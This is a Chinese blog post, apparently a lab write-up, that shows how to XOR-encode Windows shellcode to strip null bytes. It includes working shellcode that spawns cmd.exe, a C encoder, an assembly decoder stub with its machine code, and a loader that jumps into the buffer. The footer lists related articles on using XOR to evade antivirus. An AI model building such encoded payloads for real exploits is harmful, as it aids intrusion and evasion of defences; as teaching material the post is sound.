shellcode编码之异或

最新推荐文章于 2024-05-21 21:53:11 发布
最新推荐文章于 2024-05-21 21:53:11 发布
阅读量2.3k 收藏 3
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44119514/article/details/104422181
版权

之前实验的时候,弹DOS窗口的shellcode发现有\x00。根据程序要求,shellcode是不能有这样的字符串在里面,否则在使用一些函数(如:strcpy())会产生00截断:

#include "stdafx.h"
#include "stdio.h"
#include "windows.h"
#include"stdlib.h"
char shellcode[]="\x55\x8B\xEC\x83\xEC\x48\x33\xC0\x50\xB8\x2E\x65\x78\x65\x50\xB8\x63\x6D\x64\x00\x50\x8B\xC4\x6A\x05\x50\xB8\xAD\x23\x86\x7C\xFF\xD0\x3B\xF4\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D";
int main(int argc, char* argv[])
{
	__asm
	{
		lea eax,shellcode
		push eax
		ret
	}
	return 0;
}

然后,我们就要用异或对这个shellcode进行编码,参考《0day安全-软件漏洞分析技术》,对于解码,我们可以用以下几条指令实现。

#include <stdio.h>
#define KEY 0x97
void main() 
{ 
	__asm 
	{ 
		add eax, 0x14 //越过 decoder,记录 shellcode 的起始地址 
		xor ecx,ecx 
decode_loop: 
		mov bl,[eax+ecx] 
		xor bl, 0x97 //这里用 0x97 作为 key,如编码的 key 改变,这里也要相应改变 
		mov [eax+ecx],bl 
		inc ecx 
		cmp bl,0x90 //在 shellcode 末尾放上一个字节的 0x90 作为结束符 
		jne decode_loop 
	} 
}

下文再解释该解码器,所以这个时候重新添加\x90,再对shellcode进行编码:

 

#include <stdio.h>
#define KEY 0x97
unsigned char ShellCode[] = "\x55\x8B\xEC\x83\xEC\x48\x33\xC0\x50\xB8\x2E\x65\x78\x65\x50\xB8\x63\x6D\x64\x00\x50\x8B\xC4\x6A\x05\x50\xB8\xAD\x23\x86\x7C\xFF\xD0\x3B\xF4\x33\xDB\x53\xBB\xFA\xCA\x81\x7C\xFF\xD3\x8B\xE5\x5D\x90"; 
int main()
{
	int i;
	int nLen;
	unsigned char enShellCode[500]; //编码后的enShellCode
	nLen = sizeof(ShellCode)-1;     //获得ShellCode的长度
	printf("enShellcode=");
	for(i=0; i<nLen; i++)
	{
		enShellCode[i] = ShellCode[i] ^ KEY; //对每一位ShellCode作xor key编码
		printf("\\x%x",enShellCode[i]); //打印出效果
	}
	return 0;
}

运行结果复制下来保存好:

enShellcode=\xc2\x1c\x7b\x14\x7b\xdf\xa4\x57\xc7\x2f\xb9\xf2\xef\xf2\xc7\x2f\xf4\xfa\xf3\x97\xc7\x1c\x53\xfd\x92\xc7\x2f\x3a\xb4\x11\xeb\x68\x47\xac\x63\xa4\x4c\xc4\x2c\x6d\x5d\x16\xeb\x68\x44\x1c\x72\xca\x7

然后进入调试模式:

 

将解码器对应的机器码提取出:

\x83\xC0\x14\x33\xC9\x8A\x1C\x08\x80\xF3\x97\x88\x1C\x08\x41\x80\xFB\x90\x75\xF1   

将其和shellcode拼接在一起,成功运行:

 

#include "stdafx.h"
#include"stdio.h"
char shellcode[]="\x83\xC0\x14\x33\xC9\x8A\x1C\x08\x80\xF3\x97\x88\x1C\x08\x41\x80\xFB\x90\x75\xF1 "
"\xc2\x1c\x7b\x14\x7b\xdf\xa4\x57\xc7\x2f\xb9\xf2\xef\xf2\xc7\x2f\xf4\xfa\xf3\x97\xc7\x1c\x53\xfd\x92\xc7\x2f\x3a\xb4\x11\xeb\x68\x47\xac\x63\xa4\x4c\xc4\x2c\x6d\x5d\x16\xeb\x68\x44\x1c\x72\xca\x7";
int main(int argc, char* argv[])
{
	_asm
	{
		lea eax,shellcode
		push eax
		ret
	}
}

好了!现在就是讲解上面解码器的相关知识了:

#include <stdio.h>
#define KEY 0x97
void main() 
{ 
	__asm 
	{ 
		add eax, 0x14 //解密子的长度
		xor ecx,ecx //循环计数器
decode_loop: 
		mov bl,[eax+ecx] 
		xor bl, 0x97 //这里用 0x97 作为 key,如编码的 key 改变,这里也要相应改变 
		mov [eax+ecx],bl 
		inc ecx   //目标操作数+1
		cmp bl,0x90 //在 shellcode 末尾放上一个字节的 0x90 作为结束符 
		jne decode_loop 
	} 
}

其中0x14是解码器的长度,最开始,我们并不确定。这个时候我们可以随意写一个比较大的数字来装载解码器,然后进入调试模式数出来再修改!

最后一句:

 

其中的0040102d是跳转的绝对地址,但是F1是相对偏移,向前跳时,移动了13个字节,于是75 F1表示jne $-13。这个可以利用kali里面的msf-nasm_shell查看跳转指令对应的机器码。

wholes0me
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell 脚本实现二进制文件数据的异或(xor)操作
bruce_wen的专栏
02-04 4722
源码: #!/bin/sh#get file lengthfile_len=`ls -l $1 | awk {print $5;}`> $3count=0until [ "$count" -ge "$file_len" ]do        #get one byte data        temp_buffer=`hexdump  -x -s $count  -n 1
shellcode-to-dll:shellcode 异或加密并生成dll
04-23
shellcode To DLL shellcode 异或加密并生成dll
【免杀】异或加密Shellcode免杀绕过火绒、360
z2560088的博客
03-19 2178
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
恶意代码分析基础-shellcode异或解码
zzzfff__的博客
05-21 155
对于二进制Shellcode机器代码编码,通常采用类似“加壳”思想的手段,采用: 自定义编码(异或编码、计算编码、简单加解密等)的方法完成shellcode编码;通过精心构造精简干练的解码程序,放在shellcode开始执行的地方,完成shellcode的编解码;当exploit成功时,shellcode顶端的解码程序首先运行,它会在内存中将真正的shellcode还原成原来的样子,然后执行。
ShellCode异或加密去NULL小工具
weixin_30482181的博客
07-20 553
通常为了简洁及防止NULL产生,ShellCode中会使用hash加密。而也有些时候,我们直接使用加密技术去除NULL: #!/usr/bin/env python import os,sys,string #check the parameter if len(sys.argv) != 2: print 'UseAge: Encoder filename' ...
编译PI远控SHELLCODE(VC++)加异或免杀(转载于网络)
lidatou的专栏
10-04 5268
来自暗组,但原贴有诸多语法错误,以下是修正后的编译法。 一,直接编译: #include #pragma comment(linker, "/OPT:NOWIN98") #pragma comment( linker, "/subsystem:\"windows\" /
shellcode加载器用于加密shellcode的py小玩意
10-03
2. **shellcode编码和解码**:加载器需要有能力将shellcode转换为可加密的形式,并在运行时解密。这通常涉及到对原始shellcode进行某种形式的编码,如Base64或XOR,然后在内存中解码以恢复原始代码。 3. **加密算法...
ie7 0day当中的shellcode的escape+xor21加密
09-06
总结来说,"ie7 0day当中的shellcode的escape+xor21加密"是一种高级的加密技术,它结合了VBScript和JavaScript的特性,通过对shellcode进行异或和URL编码的处理,来隐藏和混淆攻击代码,从而逃避安全检查。...
windows平台下功能性shellcode的编写
11-12
- 编码可以是简单的异或操作,也可以是更复杂的算法,例如XOR循环编码或自解码Shellcode。 6. **安全性考虑**: - Shellcode编写者必须考虑到安全性和稳定性,避免崩溃目标系统,同时也要尽可能减少被发现的风险...
最新免杀360,基于shellcode字符混淆
最新发布
06-22
基于Shellcode的字符混淆是一种常见的技术,用于使恶意代码逃避反病毒软件和其他安全解决方案的检测。壳代码(Shellcode)是一段非常短小的机器码,通常用于实现特定的功能,如创建后门或执行命令行。由于其精简性和...
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang ...异或编码解码器 /enhancement 附加功能,主要用于免杀等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
异或操作
cug_coffee的博客
10-29 443
1至1000里面只有一个重复,现在需要找出这个数 一个数组中只有一个数字发生了一次,其他的都是两次,找出这个数字 一个数组中有两个数发生了一次,其他的都是两次,找出这两个数这里这个题目都是用抑或操作来处理数组里面的数据。 主要是下面这个公式// NOTICE : B = A ^ (B ^ A)第一题直接上代码了#include <iostream> #include <cstring> #incl
一个简单的异或代码
u010800530的专栏
03-24 2199
#include long long maxvalue (long long a,long long b) {     int i = 62;     if(a >= b)     {         return 0;     }     while(i >= 0 && ((1ll     {         i--;     }     return (1ll
异或与网络编码
weixin_30539625的博客
11-27 262
http://hi.baidu.com/aztack/blog/item/9e18c980592609d09123d9ef.html 找出100个数中没有被选中的一个,利用了异或的特点,相同得0,相异得1,与0异或得自己。 所以A XOR B XOR A = B,这样他的算法很快得出了缺失的一个数。 最近听到某教授大谈网络编码,听不懂讲什么,他只举了个例子,于是想到了上面看到的算法。 这是...
大型计算机变形,ShellCode编码变形大法 -电脑资料
weixin_31124869的博客
07-24 244
现在的很多有溢出漏洞的程序对ShellCode都有特定的要求,一类是对ShellCode的长度大小有限制;另一类就是不能出现某些特殊字符,比如Cmail漏洞不能有大写字母啊,Foxmail不能有0x2E,0x2F字符一类的,要ShellCode避免出现特殊字符,有两种方法:一种是编写好ShellCode后,对不合要求的字符进行指令等价变换。比如,一些IIS漏洞里面不能出现0x20,对指令Mov e...
c++ 调用c++dll_C格式shellcode异或加密生成dll 可过免杀过 Windows Defender
weixin_34093753的博客
01-26 758
C格式shellcode异或加密生成dll 可过免杀过 Windows Defender1简介项目地址:https://github.com/k-fire/shellcode-To-DLL测试环境: winserver2016 cs 4.0编译环境: win10 VS20192原理C格式shellcode异或加密写入dll文件当dll被调用或者被注入进其他进程时触发功能dll功能:解...
记一个过滤字母数字异或取反等操作写shell的php脚本
weixin_42513429的博客
05-05 559
记一个过滤字母数字异或取反等操作写shell的php脚本前几天的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本 前几天的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本 上传脚本只是第一步,访问生成A.PHP写一个小马,然后就可以蚁剑连接,但是之后就没思路了,看了大佬们的wp是真的跪了,这里单纯记录一个脚本,一开始写的洋洋洒洒超过了2048个字...
shell脚本实现逻辑关系与、或、非
热门推荐
dragon_cdut的博客
01-03 3万+
shell脚本实现逻辑关系与、或、非
异或加密与解密:异或如何能实现编码和解码?
Abandon_first的博客
05-12 1720
异或的基本情况 首先说一下异或的概念、表示和计算等基本信息。 概念:通俗一点来讲,二进制非 0 即 1,如果是一位二进制之间做异或操作,相同的异或得到 0,不同的异或得到 1。再说的朴素一点,有点像曾经很火的游戏“大家来找茬”,异或只关注“不同”。 表示:作为数学符号,异或用 ⊕\oplus⊕ 表示;程序语言中,c/c++ 和 python 都是 ^。 计算:上面说到概念的时候,用一位二进制来说的,如果是多位二进制的话,就按位操作,遇到位数不同的,位数少的那个二进制数前面(高位)补 0 使得位数一致。 异或
shellcode异或编码
06-09
Shellcode异或编码是一种常见的加密技术,可以用于防止被杀毒软件或其他安全工具检测到恶意代码。基本思路是将Shellcode中的每个字节与一个密钥进行异或运算,然后在运行时再将密钥与加密后的Shellcode进行异或解密。 例如,假设我们有一个Shellcode: ``` \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 我们可以使用一个密钥,比如0xAA,对Shellcode进行异或编码: ``` \x9b\x9a\xfb\xfb\x9c\xfb\x9e\x9d\x9e\xfb\x9a\xfb\x9a\x9d\xfb\x9d\x9c\xfb\x9b\xfb\x9c\x9d\xfb\x9e\x9a\xfb\x9c\x9a\x9d\xfb\x9b\x9c\xfb\x9a\xfb\x9d\x9a\xfb\x9a\x9e\xfb\x9c\x9d\xfb\x9e\xfb\x9b ``` 在运行时,我们再使用0xAA对加密后的Shellcode进行异或解密,就可以得到原始的Shellcode,即: ``` \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值